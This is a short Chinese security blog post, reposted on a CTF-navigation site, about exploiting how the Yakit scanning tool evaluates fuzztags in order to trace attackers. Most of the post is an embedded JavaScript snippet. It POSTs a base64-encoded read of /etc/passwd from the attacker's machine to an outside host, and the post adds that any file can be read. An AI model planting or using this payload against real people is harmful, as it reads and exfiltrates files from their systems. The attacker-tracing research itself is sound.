CTF导航 CTF导航

利用yakit功能特性溯源攻击者

渗透技巧 1年前 (2023) admin
54 0 0

杜绝废话,随便在页面上嵌入一个js,内容是:

<script>
  const xhr = new XMLHttpRequest();
  xhr.open("POST", "http://yakit.com/filesubmit");
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  xhr.send(`file={{base64enc(file(/etc/passwd))}}`);
</script>

可自由发挥,读任意文件。

利用yakit功能特性溯源攻击者

原因:yakit默认不会对经过MITM PROXY的流量中的fuzztag进行解析,但是经过插件时会被解析,所以这也是利用限制。

顺便吐槽:yakit跑起来卡卡的,啥时候能优化到和burp一样啊。


原文始发于微信公众号(Medi0cr1ty):利用yakit功能特性溯源攻击者

版权声明:admin 发表于 2023年8月10日 下午9:51。
转载请注明:利用yakit功能特性溯源攻击者 | CTF导航

相关文章

ToDesk软件在权限提升中的应用
admin
1,558
原创Paper | 从入门 .NET 到分析金蝶反序列化漏洞学习笔记
admin
395
CVE-2023-35843 NocoDB 任意文件读取漏洞
admin
223
Java安全-案例审计&数据库注入实例&框架篇
admin
29
AI辅助揭秘某宝steam低价游戏激活码投毒套路!
admin
146
记一次彩票杀猪盘渗透
admin
894

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

Boolean-based SQL Injection in ZoneMinder v1.37.* <= 1.37.64
0
Open-Source Intelligence Summit 2024议题慢递
0
NTLM Relaying – Making the Old New Again
0
每日安全动态推送(24/11/4)
0
wuzhicms<=4.1.0后台RCE(0day)
0
每周蓝军技术推送(2024.10.26-11.1)
0
Apache Solr漏洞CVE-2024-45216分析
0
某小型cms漏洞复现审计
0
Distributed RPC Framework RemoteModule has Deserialization RCE in pytorch/pytorch(CVE-2024-48063)
0
JWT(JSON Web Token) 攻击面小结
0